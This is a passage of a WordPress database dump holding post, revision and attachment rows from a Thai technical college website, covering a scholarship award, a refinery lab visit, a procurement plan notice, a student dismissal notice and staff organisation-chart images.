(4636, 3, '2018-11-20 13:59:37', '2018-11-20 06:59:37', '', '46436371_2051789371507923_8973501010056052736_n', '', 'inherit', 'closed', 'closed', '', '46436371_2051789371507923_8973501010056052736_n', '', '', '2018-11-20 13:59:37', '2018-11-20 06:59:37', '', 4635, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/46436371_2051789371507923_8973501010056052736_n.jpg', 0, 'attachment', 'image/jpeg', 0),
(4637, 3, '2018-11-20 14:00:21', '2018-11-20 07:00:21', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fniramol.raksawong%2Fposts%2F2051789654841228&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันอาทิตย์ที่ ๑๘ พฤศจิกายน ๒๕๖๑ วัดปากน้ำ (สมุทรคงคาราม) มอบทุนการศึกษาแก่นักเรียน นักศึกษาวิทยาลัยเทคนิคระยอง ในงานทอดกฐินสามัคคี จำนวน ๘ ทุน ทุนละ ๑,๕๐๐ บาท รวมเป็นเงิน ๑๒,๐๐๐ บาท', '', 'inherit', 'closed', 'closed', '', '4635-revision-v1', '', '', '2018-11-20 14:00:21', '2018-11-20 07:00:21', '', 4635, 'http://www.technicrayong.ac.th/4635-revision-v1/', 0, 'revision', '', 0),
(4638, 3, '2018-11-20 14:57:37', '2018-11-20 07:57:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D710233669352824%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ ๑๙ พฤศจิกายน ๒๕๖๑ คณะครู และนักศึกษาระดับ ปวส.๒ สาขาวิชาปิโตรเคมี และสาขาวิชาเคมีอุตสาหกรรม เยี่ยมชมห้องปฏิบัติการ บริษัท สตาร์ ปิโตรเลียม รีไฟน์นิ่ง จำกัด (มหาชน) \"SPRC Lab Open House\"', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%88%e0%b8%b1%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b9%8c%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%99-%e0%b8%9e%e0%b8%a4%e0%b8%a8%e0%b8%88%e0%b8%b4%e0%b8%81%e0%b8%b2%e0%b8%a2', '', '', '2018-11-20 14:57:37', '2018-11-20 07:57:37', '', 0, 'http://www.technicrayong.ac.th/?p=4638', 242, 'post', '', 0),
(4639, 3, '2018-11-20 14:57:19', '2018-11-20 07:57:19', '', '46488546_710232106019647_4807326030777810944_o', '', 'inherit', 'closed', 'closed', '', '46488546_710232106019647_4807326030777810944_o', '', '', '2018-11-20 14:57:19', '2018-11-20 07:57:19', '', 4638, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/46488546_710232106019647_4807326030777810944_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(4640, 3, '2018-11-20 14:57:37', '2018-11-20 07:57:37', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D710233669352824%26id%3D100010985913485&width=500\" width=\"500\" height=\"688\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันจันทร์ที่ ๑๙ พฤศจิกายน ๒๕๖๑ คณะครู และนักศึกษาระดับ ปวส.๒ สาขาวิชาปิโตรเคมี และสาขาวิชาเคมีอุตสาหกรรม เยี่ยมชมห้องปฏิบัติการ บริษัท สตาร์ ปิโตรเลียม รีไฟน์นิ่ง จำกัด (มหาชน) \"SPRC Lab Open House\"', '', 'inherit', 'closed', 'closed', '', '4638-revision-v1', '', '', '2018-11-20 14:57:37', '2018-11-20 07:57:37', '', 4638, 'http://www.technicrayong.ac.th/4638-revision-v1/', 0, 'revision', '', 0),
(4641, 3, '2018-11-21 09:14:53', '2018-11-21 02:14:53', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B9%80%E0%B8%9C%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B8%A3%E0%B9%88%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-62.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1-8', '', '', '2018-11-21 09:14:53', '2018-11-21 02:14:53', '', 0, 'http://www.technicrayong.ac.th/?p=4641', 241, 'post', '', 0),
(4642, 3, '2018-11-21 09:14:33', '2018-11-21 02:14:33', '', 'เผยแพร่แผนการจัดซื้อจัดจ้าง 62', '', 'inherit', 'closed', 'closed', '', '%e0%b9%80%e0%b8%9c%e0%b8%a2%e0%b9%81%e0%b8%9e%e0%b8%a3%e0%b9%88%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%88%e0%b8%b1%e0%b8%94%e0%b8%8b%e0%b8%b7%e0%b9%89%e0%b8%ad%e0%b8%88%e0%b8%b1', '', '', '2018-11-21 09:14:33', '2018-11-21 02:14:33', '', 4641, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/เผยแพร่แผนการจัดซื้อจัดจ้าง-62.pdf', 0, 'attachment', 'application/pdf', 0),
(4643, 3, '2018-11-21 09:14:53', '2018-11-21 02:14:53', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B9%80%E0%B8%9C%E0%B8%A2%E0%B9%81%E0%B8%9E%E0%B8%A3%E0%B9%88%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%8B%E0%B8%B7%E0%B9%89%E0%B8%AD%E0%B8%88%E0%B8%B1%E0%B8%94%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-62.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ เผยแพร่แผนการจัดซื้อจัดจ้าง ประจำปีงบประมาณ พ.ศ.๒๕๖๒', '', 'inherit', 'closed', 'closed', '', '4641-revision-v1', '', '', '2018-11-21 09:14:53', '2018-11-21 02:14:53', '', 4641, 'http://www.technicrayong.ac.th/4641-revision-v1/', 0, 'revision', '', 0),
(4644, 3, '2018-11-21 09:59:10', '2018-11-21 02:59:10', '<img class=\"aligncenter size-full wp-image-1614\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" />\n\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"381\" height=\"102\" />\n\n ', 'งานอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '1572-autosave-v1', '', '', '2018-11-21 09:59:10', '2018-11-21 02:59:10', '', 1572, 'http://www.technicrayong.ac.th/1572-autosave-v1/', 0, 'revision', '', 0),
(4645, 3, '2018-11-21 09:59:14', '2018-11-21 02:59:14', '', '21-11-2561 10-01-27', '', 'inherit', 'closed', 'closed', '', '21-11-2561-10-01-27', '', '', '2018-11-21 09:59:14', '2018-11-21 02:59:14', '', 1572, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg', 0, 'attachment', 'image/jpeg', 0),
(4646, 3, '2018-11-21 09:59:38', '2018-11-21 02:59:38', '<img class=\"aligncenter size-full wp-image-1614\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1493 \" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"381\" height=\"102\" /><a href=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\"><img class=\"aligncenter size-full wp-image-4645\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\" alt=\"\" width=\"563\" height=\"358\" /></a>', 'งานอาคารสถานที่', '', 'inherit', 'closed', 'closed', '', '1572-revision-v1', '', '', '2018-11-21 09:59:38', '2018-11-21 02:59:38', '', 1572, 'http://www.technicrayong.ac.th/1572-revision-v1/', 0, 'revision', '', 0),
(4647, 3, '2018-11-21 10:11:03', '2018-11-21 03:11:03', '', '21-11-2561 10-13-17', '', 'inherit', 'closed', 'closed', '', '21-11-2561-10-13-17', '', '', '2018-11-21 10:11:03', '2018-11-21 03:11:03', '', 1576, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg', 0, 'attachment', 'image/jpeg', 0),
(4648, 3, '2018-11-21 10:11:47', '2018-11-21 03:11:47', '<img class=\"aligncenter size-full wp-image-1619\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" />\r\n\r\n<img class=\"aligncenter wp-image-1496 \" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /><a href=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\"><img class=\"aligncenter size-full wp-image-4647\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\" alt=\"\" width=\"713\" height=\"620\" /></a>\r\n<h3><span style=\"color: #993300;\">** ข้อมูลนักเรียน นักศึกษา </span> <a href=\"/%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9-2/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n<h3><span style=\"color: #993300;\">** รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา </span><a href=\"/%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9C%E0%B8%A5%E0%B8%AA%E0%B8%B1%E0%B8%A1%E0%B8%A4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%97%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A3/\"><span style=\"color: #ff0000;\">คลิกที่นี่</span></a></h3>\r\n ', 'งานทะเบียน', '', 'inherit', 'closed', 'closed', '', '1576-revision-v1', '', '', '2018-11-21 10:11:47', '2018-11-21 03:11:47', '', 1576, 'http://www.technicrayong.ac.th/1576-revision-v1/', 0, 'revision', '', 0),
(4649, 3, '2018-11-21 10:19:18', '2018-11-21 03:19:18', '<a href=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\"><img class=\"aligncenter size-full wp-image-3932\" src=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a><a href=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\"><img class=\"aligncenter wp-image-3933\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\" alt=\"\" width=\"382\" height=\"100\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-3934 size-full\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-43-33.jpg\" alt=\"\" width=\"195\" height=\"240\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3452 size-full\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\"><img class=\"aligncenter size-full wp-image-4604\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\" alt=\"\" width=\"656\" height=\"339\" /></a><a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/11/3151420245.jpg\"><img class=\"aligncenter size-full wp-image-4607\" src=\"/wp-content/uploads/2018/11/3151420245.jpg\" alt=\"\" width=\"430\" height=\"319\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-4609 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg\" alt=\"\" width=\"191\" height=\"237\" /></a>\r\n\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"370\" height=\"101\" /></a> <a href=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\"><img class=\"aligncenter wp-image-4617 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\" alt=\"\" width=\"1109\" height=\"345\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a><a href=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\"><img class=\"aligncenter size-full wp-image-4645\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\" alt=\"\" width=\"563\" height=\"358\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\"><img class=\"aligncenter size-full wp-image-4647\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\" alt=\"\" width=\"713\" height=\"620\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-11-21 10:19:18', '2018-11-21 03:19:18', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(4650, 3, '2018-11-21 10:21:37', '2018-11-21 03:21:37', '<a href=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\"><img class=\"aligncenter size-full wp-image-3932\" src=\"/wp-content/uploads/2018/09/14-3-2561-9-15-49.jpg\" alt=\"\" width=\"193\" height=\"240\" /></a><a href=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\"><img class=\"aligncenter wp-image-3933\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-23-35.jpg\" alt=\"\" width=\"382\" height=\"100\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-3934 size-full\" src=\"/wp-content/uploads/2018/09/18-9-2561-9-43-33.jpg\" alt=\"\" width=\"195\" height=\"240\" /></a><a href=\"/งานบริหารงานทั่วไป\"><img class=\"aligncenter wp-image-1456\" src=\"/wp-content/uploads/2018/03/นางรุจิรดานันท์-พันกาฬสินธุ์.jpg\" alt=\"\" width=\"382\" height=\"107\" /></a><a href=\"/งานบุคลากร\"><img class=\"aligncenter wp-image-2067 size-full\" src=\"/wp-content/uploads/2018/05/2-5-2561-13-59-36-2.jpg\" alt=\"\" width=\"913\" height=\"318\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3452 size-full\" src=\"/wp-content/uploads/2018/07/นางศิริพรรณ-ยับยั้ง.jpg\" alt=\"\" width=\"196\" height=\"242\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9A%E0%B8%B8%E0%B8%84%E0%B8%A5%E0%B8%B2%E0%B8%81%E0%B8%A3/\"><img class=\"aligncenter wp-image-3379\" src=\"/wp-content/uploads/2018/07/10-7-2561-10-06-54.jpg\" alt=\"\" width=\"371\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\"><img class=\"aligncenter size-full wp-image-4604\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-27-42.jpg\" alt=\"\" width=\"656\" height=\"339\" /></a><a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1600 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-06-42.jpg\" alt=\"\" width=\"196\" height=\"244\" /></a>\r\n\r\n<a href=\"/งานการเงิน\"><img class=\"aligncenter wp-image-1473\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-34-40.jpg\" alt=\"\" width=\"375\" height=\"100\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/11/3151420245.jpg\"><img class=\"aligncenter size-full wp-image-4607\" src=\"/wp-content/uploads/2018/11/3151420245.jpg\" alt=\"\" width=\"430\" height=\"319\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1603 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-11-03.jpg\" alt=\"\" width=\"193\" height=\"239\" /></a>\r\n\r\n<a href=\"/งานการบัญชี\"><img class=\"aligncenter wp-image-1478\" src=\"/wp-content/uploads/2018/03/5-3-2561-12-52-08.jpg\" alt=\"\" width=\"375\" height=\"104\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1592 size-full\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-22-38.jpg\" alt=\"\" width=\"455\" height=\"323\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-4609 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-14-52-31.jpg\" alt=\"\" width=\"191\" height=\"237\" /></a>\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%9E%E0%B8%B1%E0%B8%AA%E0%B8%94%E0%B8%B8/\"><img class=\"aligncenter wp-image-3382\" src=\"/wp-content/uploads/2018/07/145623013221.jpg\" alt=\"\" width=\"370\" height=\"101\" /></a><a href=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\"><img class=\"aligncenter size-full wp-image-4611\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-10-30.jpg\" alt=\"\" width=\"162\" height=\"204\" /></a><a href=\"/wp-content/uploads/2018/11/Picture1.png\"><img class=\"aligncenter wp-image-4612\" src=\"/wp-content/uploads/2018/11/Picture1.png\" alt=\"\" width=\"386\" height=\"103\" /></a> <a href=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\"><img class=\"aligncenter wp-image-4617 size-full\" src=\"/wp-content/uploads/2018/11/16-11-2561-15-30-44.jpg\" alt=\"\" width=\"1109\" height=\"345\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1614 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-37-08.jpg\" alt=\"\" width=\"194\" height=\"238\" /></a>\r\n\r\n<a href=\"/งานอาคารสถานที่\"><img class=\"aligncenter wp-image-1493\" src=\"/wp-content/uploads/2018/03/5-3-2561-14-52-41.jpg\" alt=\"\" width=\"382\" height=\"102\" /></a><a href=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\"><img class=\"aligncenter size-full wp-image-4645\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-01-27.jpg\" alt=\"\" width=\"563\" height=\"358\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1619 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-13-46-48.jpg\" alt=\"\" width=\"193\" height=\"238\" /></a><a href=\"/งานทะเบียน\"><img class=\"aligncenter wp-image-1496\" src=\"/wp-content/uploads/2018/03/5-3-2561-15-42-18.jpg\" alt=\"\" width=\"384\" height=\"105\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\"><img class=\"aligncenter size-full wp-image-4647\" src=\"/wp-content/uploads/2018/11/21-11-2561-10-13-17.jpg\" alt=\"\" width=\"713\" height=\"620\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1623 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-12-02.jpg\" alt=\"\" width=\"195\" height=\"241\" /></a>\r\n\r\n<a href=\"/งานประชาสัมพันธ์\"><img class=\"aligncenter wp-image-1503\" src=\"/wp-content/uploads/2018/03/6-3-2561-9-34-49.jpg\" alt=\"\" width=\"362\" height=\"98\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1626 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-17-46.jpg\" alt=\"\" width=\"244\" height=\"311\" />\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายบริหารทรัพยากร', '', 'inherit', 'closed', 'closed', '', '1451-revision-v1', '', '', '2018-11-21 10:21:37', '2018-11-21 03:21:37', '', 1451, 'http://www.technicrayong.ac.th/1451-revision-v1/', 0, 'revision', '', 0),
(4651, 3, '2018-11-22 09:33:04', '2018-11-22 02:33:04', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-%E0%B8%9E%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A0%E0%B8%B2%E0%B8%9E-2-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน นักศึกษา พ้นสภาพเนื่องจากขาดเรียนเกินกว่า ๑๕ วันติดต่อกัน และไม่ลงทะเบียน ภาคเรียนที่ ๒ ปีการศึกษา ๒๕๖๑', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b9%83%e0%b8%ab%e0%b9%89%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8-4', '', '', '2018-11-22 09:33:04', '2018-11-22 02:33:04', '', 0, 'http://www.technicrayong.ac.th/?p=4651', 240, 'post', '', 0),
(4652, 3, '2018-11-22 09:31:12', '2018-11-22 02:31:12', '', 'นักเรียน นักศึกษา พ้นสภาพ 2-2561', '', 'inherit', 'closed', 'closed', '', '%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b8%a8%e0%b8%b6%e0%b8%81%e0%b8%a9%e0%b8%b2-%e0%b8%9e%e0%b9%89%e0%b8%99%e0%b8%aa%e0%b8%a0%e0%b8%b2', '', '', '2018-11-22 09:31:12', '2018-11-22 02:31:12', '', 4651, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/11/นักเรียน-นักศึกษา-พ้นสภาพ-2-2561.pdf', 0, 'attachment', 'application/pdf', 0),
(4653, 3, '2018-11-22 09:33:04', '2018-11-22 02:33:04', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F11%2F%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99-%E0%B8%99%E0%B8%B1%E0%B8%81%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2-%E0%B8%9E%E0%B9%89%E0%B8%99%E0%B8%AA%E0%B8%A0%E0%B8%B2%E0%B8%9E-2-2561.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ ให้นักเรียน นักศึกษา พ้นสภาพเนื่องจากขาดเรียนเกินกว่า ๑๕ วันติดต่อกัน และไม่ลงทะเบียน ภาคเรียนที่ ๒ ปีการศึกษา ๒๕๖๑', '', 'inherit', 'closed', 'closed', '', '4651-revision-v1', '', '', '2018-11-22 09:33:04', '2018-11-22 02:33:04', '', 4651, 'http://www.technicrayong.ac.th/4651-revision-v1/', 0, 'revision', '', 0),
